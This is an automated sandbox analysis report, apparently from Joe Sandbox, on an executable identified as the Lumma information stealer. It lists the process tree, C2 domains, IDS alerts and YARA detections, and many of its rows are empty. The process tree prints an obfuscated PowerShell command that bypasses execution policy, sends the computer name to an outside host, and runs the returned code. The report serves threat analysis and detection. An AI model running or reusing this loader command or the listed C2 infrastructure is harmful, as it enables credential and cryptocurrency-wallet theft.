Windows
Analysis Report
Set-UpFile_v25.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- Set-UpFile_v25.exe (PID: 7272 cmdline:
"C:\Users\ user\Deskt op\Set-UpF ile_v25.ex e" MD5: 2F33775C502E7B2D60B9BFE944B46863) - powershell.exe (PID: 7596 cmdline:
powershell -exec byp ass [Net.s ervicepOIN TmANaGer]: :SEcURiTyP rOtoCOl = [Net.SecUr iTyprOtoco ltYPe]::tL s12; $gD=' https://df gh.online/ invoker.ph p?compName ='+$env:co mputername ; $pTSr = iWr -uRi $ gD -uSebAS IcpARsiNg -UsErAGent 'Mozilla/ 5.0 (Windo ws NT 10.0 ; Win64; x 64) AppleW ebKit/57.3 6 (KHTML, like Gecko ) Chrome/1 2.0.0.0 Sa fari/57.36 '; IEx $Pt sr.Content ; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 7604 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution |
{"C2 url": ["cloudewahsj.shop", "tirepublicerj.shop", "wholersorie.shop", "rabidcowse.shop", "abruptyopsn.shop", "beattalkerz.cyou", "framekgirus.shop", "noisycuttej.shop", "nearycrepso.shop"], "Build id": "hRjzG3--ZINA"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | ||
JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
Windows_Trojan_Donutloader_f40e3759 | unknown | unknown |
| |
JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): |
Source: | Author: frack113: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T14:37:11.659198+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49748 | 104.21.25.52 | 443 | TCP |
2025-01-07T14:37:12.609952+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49749 | 104.21.25.52 | 443 | TCP |
2025-01-07T14:37:13.913865+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49750 | 104.21.25.52 | 443 | TCP |
2025-01-07T14:37:15.152429+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49751 | 104.21.25.52 | 443 | TCP |
2025-01-07T14:37:16.395868+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49752 | 104.21.25.52 | 443 | TCP |
2025-01-07T14:37:22.773652+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49754 | 104.21.25.52 | 443 | TCP |
2025-01-07T14:37:24.415568+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49755 | 104.21.25.52 | 443 | TCP |
2025-01-07T14:37:26.047768+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49756 | 104.21.25.52 | 443 | TCP |
2025-01-07T14:37:28.145395+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49757 | 104.21.25.52 | 443 | TCP |
2025-01-07T14:37:29.414835+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49758 | 185.161.251.21 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T14:37:12.141741+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 104.21.25.52 | 443 | TCP |
2025-01-07T14:37:13.061485+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 104.21.25.52 | 443 | TCP |
2025-01-07T14:37:28.640242+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49757 | 104.21.25.52 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T14:37:12.141741+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 104.21.25.52 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T14:37:13.061485+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 104.21.25.52 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T14:37:24.859758+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49755 | 104.21.25.52 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-07T14:37:26.052786+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.4 | 49756 | 104.21.25.52 | 443 | TCP |
Click to jump to signature section
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Malware Configuration Extractor: |
Source: | Integrated Neural Analysis Model: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 0_2_029AA1F9 | |
Source: | Code function: | 0_2_029AB28E | |
Source: | Code function: | 0_2_029AA282 | |
Source: | Code function: | 0_2_029BE2C2 | |
Source: | Code function: | 0_2_029BE2C2 | |
Source: | Code function: | 0_2_02983A12 | |
Source: | Code function: | 0_2_0299A202 | |
Source: | Code function: | 0_2_0299038C | |
Source: | Code function: | 0_2_029AFBD2 | |
Source: | Code function: | 0_2_0298DBD2 | |
Source: | Code function: | 0_2_0299A3E3 | |
Source: | Code function: | 0_2_0299A3E3 | |
Source: | Code function: | 0_2_029963E2 | |
Source: | Code function: | 0_2_0298AB12 | |
Source: | Code function: | 0_2_0298AB12 | |
Source: | Code function: | 0_2_0299CB12 | |
Source: | Code function: | 0_2_029C4362 | |
Source: | Code function: | 0_2_029968A7 | |
Source: | Code function: | 0_2_0298C8E2 | |
Source: | Code function: | 0_2_029AD811 | |
Source: | Code function: | 0_2_029AD811 | |
Source: | Code function: | 0_2_0298C035 | |
Source: | Code function: | 0_2_029A4852 | |
Source: | Code function: | 0_2_029AB041 | |
Source: | Code function: | 0_2_02997070 | |
Source: | Code function: | 0_2_029A11F2 | |
Source: | Code function: | 0_2_029969E8 | |
Source: | Code function: | 0_2_029969E8 | |
Source: | Code function: | 0_2_029901EA | |
Source: | Code function: | 0_2_0298CE9F | |
Source: | Code function: | 0_2_0298E6BD | |
Source: | Code function: | 0_2_029BE6B2 | |
Source: | Code function: | 0_2_0299EEB2 | |
Source: | Code function: | 0_2_0299D6A3 | |
Source: | Code function: | 0_2_0299D6A3 | |
Source: | Code function: | 0_2_02997ED9 | |
Source: | Code function: | 0_2_029AE612 | |
Source: | Code function: | 0_2_029A1622 | |
Source: | Code function: | 0_2_029ACE22 | |
Source: | Code function: | 0_2_0298CE43 | |
Source: | Code function: | 0_2_029C3672 | |
Source: | Code function: | 0_2_029A0F82 | |
Source: | Code function: | 0_2_02988F82 | |
Source: | Code function: | 0_2_02988F82 | |
Source: | Code function: | 0_2_029C1702 | |
Source: | Code function: | 0_2_029C0F02 | |
Source: | Code function: | 0_2_02998744 | |
Source: | Code function: | 0_2_02998744 | |
Source: | Code function: | 0_2_0299C4EB | |
Source: | Code function: | 0_2_0299B442 | |
Source: | Code function: | 0_2_0299ADBD | |
Source: | Code function: | 0_2_0299ADBD | |
Source: | Code function: | 0_2_0298C5A2 | |
Source: | Code function: | 0_2_0299E5A2 | |
Source: | Code function: | 0_2_0299DDE9 | |
Source: | Code function: | 0_2_02999DE8 | |
Source: | Code function: | 0_2_029C0D32 | |
Source: | Code function: | 0_2_029BD522 | |
Source: | Code function: | 0_2_029AAD42 |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
System Summary |
---|
Source: | Matched rule: |
Source: | Code function: | 0_2_029D2D35 |
Source: | Code function: | 0_2_02980375 | |
Source: | Code function: | 0_2_029D2D35 | |
Source: | Code function: | 0_2_029A4292 | |
Source: | Code function: | 0_2_0299C2A2 | |
Source: | Code function: | 0_2_029C4AA2 | |
Source: | Code function: | 0_2_029BE2C2 | |
Source: | Code function: | 0_2_0298B2C2 | |
Source: | Code function: | 0_2_0299F2C2 | |
Source: | Code function: | 0_2_02985AF2 | |
Source: | Code function: | 0_2_029ABA13 | |
Source: | Code function: | 0_2_0299EA34 | |
Source: | Code function: | 0_2_0298A252 | |
Source: | Code function: | 0_2_029B0392 | |
Source: | Code function: | 0_2_029BCBC2 | |
Source: | Code function: | 0_2_0299A3F0 | |
Source: | Code function: | 0_2_029963E2 | |
Source: | Code function: | 0_2_0298F338 | |
Source: | Code function: | 0_2_02987352 | |
Source: | Code function: | 0_2_029A3B42 | |
Source: | Code function: | 0_2_029ACB68 | |
Source: | Code function: | 0_2_02984362 | |
Source: | Code function: | 0_2_029928C9 | |
Source: | Code function: | 0_2_0299E0FA | |
Source: | Code function: | 0_2_0298C8E2 | |
Source: | Code function: | 0_2_029AD811 | |
Source: | Code function: | 0_2_029AA872 | |
Source: | Code function: | 0_2_029BE862 | |
Source: | Code function: | 0_2_029881A2 | |
Source: | Code function: | 0_2_029AC9F2 | |
Source: | Code function: | 0_2_0299D955 | |
Source: | Code function: | 0_2_02985142 | |
Source: | Code function: | 0_2_0299A961 | |
Source: | Code function: | 0_2_0299EEB2 | |
Source: | Code function: | 0_2_0299F6C2 | |
Source: | Code function: | 0_2_029A966A | |
Source: | Code function: | 0_2_02988F82 | |
Source: | Code function: | 0_2_029A1F80 | |
Source: | Code function: | 0_2_0299BFC2 | |
Source: | Code function: | 0_2_029C47F2 | |
Source: | Code function: | 0_2_02984742 | |
Source: | Code function: | 0_2_02998744 | |
Source: | Code function: | 0_2_029C0F72 | |
Source: | Code function: | 0_2_029934B7 | |
Source: | Code function: | 0_2_02993CCF | |
Source: | Code function: | 0_2_0299C4EB | |
Source: | Code function: | 0_2_029B3412 | |
Source: | Code function: | 0_2_02990C22 | |
Source: | Code function: | 0_2_0299B442 | |
Source: | Code function: | 0_2_029C4442 | |
Source: | Code function: | 0_2_029A75D2 | |
Source: | Code function: | 0_2_0298ADD2 | |
Source: | Code function: | 0_2_0299FDC2 | |
Source: | Code function: | 0_2_029C4DE2 | |
Source: | Code function: | 0_2_02987D12 | |
Source: | Code function: | 0_2_029BD522 | |
Source: | Code function: | 0_2_0298A542 |
Source: | Static PE information: |
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Static PE information: |
Source: | Matched rule: |
Source: | Classification label: |
Source: | Code function: | 0_2_02980A85 |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Binary or memory string: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | File read: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Static file information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Data Obfuscation |
---|
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 0_2_02995E5C | |
Source: | Code function: | 4_2_06F81BBD | |
Source: | Code function: | 4_2_06F81AEA | |
Source: | Code function: | 4_2_06F81DE5 | |
Source: | Code function: | 4_2_06F81D7F | |
Source: | Code function: | 4_2_06F81D60 | |
Source: | Code function: | 4_2_06F81D27 |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
Source: | System information queried: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior |
Source: | WMI Queries: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 0_2_02980375 | |
Source: | Code function: | 0_2_02980935 | |
Source: | Code function: | 0_2_02980F84 | |
Source: | Code function: | 0_2_02980F85 | |
Source: | Code function: | 0_2_02980CE5 |
Source: | Process token adjusted: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Binary or memory string: |
Source: | WMI Queries: |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
